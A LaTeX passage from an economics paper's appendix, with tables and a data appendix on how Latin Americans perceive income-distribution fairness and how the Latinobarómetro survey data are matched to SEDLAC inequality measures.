\textbf{\hspace{-1em} Panel E. Country} & & & & \\
Argentina & 38.17 & 50.74 & 10.26 & 0.83 \\
Bolivia & 18.01 & 56.13 & 23.39 & 2.48 \\
Brazil & 31.95 & 53.71 & 12.85 & 1.49 \\
Chile & 40.20 & 49.93 & 8.42 & 1.45 \\
Colombia & 35.15 & 51.20 & 11.40 & 2.26 \\
Costa Rica & 23.20 & 53.55 & 20.13 & 3.12 \\
Dominican Rep. & 32.31 & 46.52 & 17.61 & 3.56 \\
Ecuador & 21.45 & 47.46 & 27.58 & 3.51 \\
El Salvador & 22.73 & 53.16 & 20.45 & 3.65 \\
Guatemala & 28.29 & 51.34 & 16.70 & 3.66 \\
Honduras & 28.87 & 53.42 & 14.33 & 3.38 \\
Mexico & 32.15 & 49.75 & 15.32 & 2.78 \\
Nicaragua & 18.69 & 51.88 & 24.33 & 5.11 \\
Panama & 27.39 & 48.01 & 20.25 & 4.34 \\
Paraguay & 38.31 & 48.80 & 10.95 & 1.93 \\
Peru & 25.03 & 61.89 & 11.70 & 1.38 \\
Uruguay & 18.22 & 57.51 & 22.64 & 1.64 \\
Venezuela & 23.51 & 42.96 & 26.62 & 6.92 \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Note:} This table shows the fraction of individuals in our sample who perceive the income distribution as very unfair, unfair, fair, or very fair.
\end{singlespace}
}
\end{table}
\clearpage
\begin{table}[htpb!]{\footnotesize
\begin{center}
\caption{Logit regressions of unfairness perceptions (unfair) and individual characteristics} \label{unfair_logit}
\newcommand\w{1.30}
\begin{tabular}{l@{}lR{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}}
\midrule
&& \multicolumn{12}{c}{Dependent Variable: Believes income distribution is unfair or very unfair} \\\cmidrule{3-14}
&& (1) && (2) && (3) && (4) && (5) && (6) \\
\midrule
\ExpandableInput{results/unfair_logit}
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Notes:} This table shows estimates of the relationship between an indicator that equals one for individuals who believe that the income distribution is unfair or very unfair and the Gini coefficient controlling for individuals' characteristics. Coefficients are estimated through Logit regressions and represent the marginal effects evaluated at the mean values of the rest of the variables. Observations are weighted by the individual's probability of being interviewed. All specifications include country and year fixed effects. $^{***}$, $^{**}$ and $^*$ denote significance at 10\%, 5\% and 1\% levels, respectively. Heteroskedasticity-robust standard errors clustered at the country-by-year level in parentheses.
\end{singlespace}
}
\end{table}
\clearpage
\begin{table}[htpb!]{\footnotesize
\begin{center}
\caption{Logit regressions of unfairness perceptions (very unfair) and different inequality indicators} \label{unfair_ineq_logit}
\newcommand\w{1.50}
\begin{tabular}{l@{}lR{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}}
\midrule
&& \multicolumn{10}{c}{Dependent Variable: Believes income distribution is very unfair} \\\cmidrule{3-12}
&& (1) && (2) && (3) && (4) && (5) \\
\midrule
\ExpandableInput{results/very_unfair_ineq_logit}
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Notes:} This table shows estimates of the relationship between an indicator that equals one for individuals who believe income distribution is unfair or very unfair and several inequality indicators controlling for individuals' characteristics. Coefficients are estimated through Logit regressions and represent the marginal effects evaluated at the mean values of the rest of the variables. Observations are weighted by the individual's probability of being interviewed. All specifications include country and year fixed effects. $^{***}$, $^{**}$ and $^*$ denote significance at 10\%, 5\% and 1\% levels, respectively. Heteroskedasticity-robust standard errors clustered at the country-by-year level in parentheses.
\end{singlespace}
}
\end{table}
\begin{table}[htpb!]{\footnotesize
\begin{center}
\caption{OLS regressions of unfairness perceptions (very unfair) and individual characteristics} \label{very_unfair_lpm}
\newcommand\w{1.30}
\begin{tabular}{l@{}lR{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}}
\midrule
&& \multicolumn{12}{c}{Dependent Variable: Believes income distribution is very unfair} \\\cmidrule{3-14}
&& (1) && (2) && (3) && (4) && (5) && (6) \\
\midrule
\ExpandableInput{results/very_unfair_lpm}
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Notes:} This table presents estimates of the correlation between a dummy variable that indicates if the individual believes income distribution is unfair or very unfair and the Gini coefficient controlling for individuals' characteristics. Coefficients are estimated through a linear probability model. Observations are weighted by the individual's probability of being interviewed. All specifications include country and year fixed effects. $^{***}$, $^{**}$ and $^*$ denote significance at 10\%, 5\% and 1\% levels, respectively. Heteroskedasticity-robust standard errors clustered at the country-by-year level in parentheses.
\end{singlespace}
}
\end{table}
\section{Data Appendix} \label{sec_data}
\setcounter{table}{0}
\setcounter{figure}{0}
\renewcommand{\thetable}{B\arabic{table}}
\renewcommand{\thefigure}{B\arabic{figure}}
The figures presented in this paper are based on two harmonization projects, known as Latinobar\'ometro and SEDLAC (Socio-Economic Database for Latin America and the Caribbean). In this Appendix, we describe how we make both sources compatible.
Our perceptions data come from Latinobar\'ometro, which has conducted opinion surveys in 18 LA countries since the 1990s, interviewing about 1,200 individuals per country about individuals' socioeconomic background, and preferences towards political and social issues. Unfortunately, not all years contain questions about individuals' fairness perceptions. The survey was designed to be representative of the voting-age population at the national level (in most LA countries, individuals aged over 18). In Table \ref{tab-coverage} we show what percentage of the voting-age population is represented by the survey in each country for all the years in which the fairness question is available.
\begin{table}[htbp]{\footnotesize
\begin{center}
\caption{Coverage of each country's population in Latinobar\'ometro overtime (in \%)}\label{tab-coverage}
\begin{tabular}{lrrrrrrrrr}
\midrule
& 1997 & 2001 & 2002 & 2007 & 2009 & 2010 & 2011 & 2013 & 2015 \\
\midrule
Argentina & 68 & 75 & 75 & 100 & 100 & 100 & 100 & 100 & 100 \\
Bolivia & 32 & 52 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Brazil & 12 & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Chile & 70 & 70 & 70 & 100 & 100 & 100 & 100 & 100 & 100 \\
Colombia & 25 & 71 & 51 & 100 & 100 & 100 & 100 & 100 & 100 \\
Costa Rica & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Dominican Republic & \multicolumn{1}{c}{ N/A } & \multicolumn{1}{c}{ N/A } & \multicolumn{1}{c}{ N/A } & 100 & 100 & 100 & 100 & 100 & 100 \\
Ecuador & 97 & 97 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
El Salvador & 65 & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Guatemala & 100 & 100 & 100 & 97 & 100 & 100 & 100 & 100 & 100 \\
Honduras & 100 & 100 & 100 & 98 & 100 & 99 & 99 & 99 & 99 \\
Mexico & 93 & 88 & 95 & 100 & 100 & 100 & 100 & 100 & 100 \\
Nicaragua & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Panama & 100 & 100 & 100 & 99 & 99 & 99 & 99 & 99 & 99 \\
Paraguay & 46 & 46 & 46 & 100 & 100 & 100 & 100 & 100 & 100 \\
Peru & 52 & 52 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Uruguay & 80 & 80 & 80 & 100 & 100 & 100 & 100 & 100 & 100 \\
Venezuela & 100 & 100 & 100 & 100 & 93 & 100 & 100 & 100 & 100 \\
Weighted average & 68 & 86 & 91 & 100 & 100 & 100 & 100 & 100 & 100 \\
\midrule
\end{tabular}
\end{center}
}
\end{table}
Since our goal is to analyze how unfairness perceptions evolved vis-\`a-vis changes in income inequality, we put a lot of effort into getting income inequality data for each data point for which we have perceptions data available. We made two partial fixes to increase the number of observations available (without pushing the data too much). First, we filled the data gaps using household surveys of relatively close years in which previously unused data were available (see Appendix Table \ref{tab-circa}). For instance, Chile conducts household surveys on average every two years. In 1997, there is perceptions data available, but no data on income inequality. Therefore, we use the inequality data from an adjacent year (1998). As noted previously, we only use data from close years if the data from the adjacent year correspond to a year in which the perceptions question was not asked (and therefore, inequality data are not needed in that year).
\begin{table}[htbp]{\footnotesize
\begin{center}
\caption{Circa years used to fill data gaps}\label{tab-circa}
\begin{tabular}{lcc}
\midrule
Country & Year without household data & Data point used instead \\
\midrule
Chile & 1997 & 1998 \\
Chile & 2001 & 2000 \\
Chile & 2002 & 2003 \\
Chile & 2007 & 2006 \\
Colombia & 2007 & 2008 \\
Ecuador & 2002 & 2003 \\
El Salvador & 1997 & 1998 \\
Guatemala & 2001 & 2000 \\
Guatemala & 2015 & 2014 \\
Mexico & 1997 & 1998 \\
Mexico & 2001 & 2000 \\
Mexico & 2007 & 2006 \\
Mexico & 2009 & 2008 \\
Mexico & 2011 & 2012 \\
Mexico & 2015 & 2014 \\
Nicaragua & 1997 & 1998 \\
Nicaragua & 2007 & 2005 \\
Nicaragua & 2015 & 2014 \\
Venezuela & 2013 & 2012 \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify
\end{singlespace}
}
\end{table}
Our second partial fix involves interpolating inequality indicators for some years. For some countries, a few years had perceptions data available but no comparable household survey over time and no close year available. In this case, and to analyze the same set of countries every year, interpolation was applied to the inequality indicators (see Appendix Table \ref{tab-interp}).
\begin{table}[htbp]{\footnotesize
\begin{center}
\caption{Years in which inequality indicators were calculated with a linear interpolation}\label{tab-interp}
\begin{tabular}{ll}
\midrule
Country & Years interpolated \\
\midrule
Argentina & 1997, 2001, and 2002 \\
Bolivia & 2010 \\
Brazil & 2010 \\
Chile & 2010 \\
Colombia & 1997 \\
Costa Rica & 1997, 2001, 2002, 2007, and 2009 \\
Ecuador & 1997, 2001 \\
Guatemala & 1997, 2002, 2009, 2010, and 2013 \\
Mexico & 2013 \\
Nicaragua & 2002, 2010, 2011, and 2013 \\
Panama & 1997, 2001, 2002, and 2007 \\
Peru & 1997, 2001, 2002 \\
Venezuela & 2015 \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify
\end{singlespace}
}
\end{table}
Overall, the years in which income inequality was calculated using linear interpolations represent a relatively small share of the total data points (17\% of total). The majority of our inequality data points (69\%) are calculated using a household survey from the same year in which the perceptions polls were conducted, while the remaining 14\% of our inequality indicators are calculated using household surveys from adjacent years. Table \ref{tab-summ-data} summarizes the data sources used in years perceptions data are available.
\begin{table}[htbp]{\footnotesize
\begin{center}
\caption{Summary of the data used in every country-year}\label{tab-summ-data}
\begin{tabular}{r|r|llllllll}
\multicolumn{1}{r}{} & \multicolumn{1}{r}{1997} & \multicolumn{1}{r}{2001} & \multicolumn{1}{r}{2002} & \multicolumn{1}{r}{2007} & \multicolumn{1}{r}{2009} & \multicolumn{1}{r}{2010} & \multicolumn{1}{r}{2011} & \multicolumn{1}{r}{2013} & \multicolumn{1}{r}{2015} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Argentina} & \cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Bolivia} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Brazil} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Chile} & \cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Colombia} & \cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Costa Rica} & \cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Dominican Rep.} & \cellcolor[rgb]{ .749, .749, .749}\textcolor[rgb]{ .749, .749, .749}{0} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Ecuador} & \cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{El Salvador} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Guatemala} & \cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Honduras} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Mexico} & \cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Nicaragua} & \cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Panama} & \cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Paraguay} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Peru} & \cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
